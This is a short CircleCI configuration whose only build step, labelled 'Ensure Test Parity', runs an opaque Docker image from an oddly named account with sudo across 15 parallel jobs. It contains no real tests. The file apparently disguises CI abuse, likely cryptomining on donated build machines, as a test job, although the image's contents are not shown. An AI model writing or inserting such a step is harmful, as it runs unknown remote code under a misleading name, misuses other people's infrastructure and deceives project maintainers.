version: 2.1
jobs:
  build:
    parallelism: 15
    machine:
      image: ubuntu-2004:202101-01
    steps:
      - checkout
      - run:
          name: Ensure Test Parity
          command: |
                 sudo docker run amberbecerrajessica/49261161:58818867